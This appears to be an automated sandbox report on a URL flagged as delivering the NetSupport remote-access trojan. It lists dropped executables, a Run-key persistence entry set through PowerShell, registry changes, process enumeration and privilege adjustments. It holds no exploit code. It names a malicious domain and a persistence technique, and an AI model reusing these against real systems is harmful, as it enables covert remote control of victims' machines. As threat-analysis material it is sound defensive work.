Malware Analysis Report

2024-10-23 16:16

Sample ID 240124-zhst2aghdp
Target http://blawx.com
Tags
netsupport persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file http://blawx.com was found to be: Known bad.

Malicious Activity Summary

netsupport persistence rat

NetSupport

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Enumerates physical storage devices

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Script User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-24 20:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-24 20:43

Reported

2024-01-24 20:49

Platform

win10-20231215-en

Max time kernel

359s

Max time network

368s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://blawx.com

Signatures

NetSupport

rat netsupport

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX911\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX276\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-468\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-637\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\DIVX-893\client32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000\Software\Microsoft\Windows\CurrentVersion\Run\OFFICE = "C:\\Users\\Admin\\AppData\\Roaming\\DIVX911\\client32.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133506026383362281" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = 00000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f44471a0359723fa74489c55595fe6b30ee0000 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3196661410-1888440797-2304965013-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
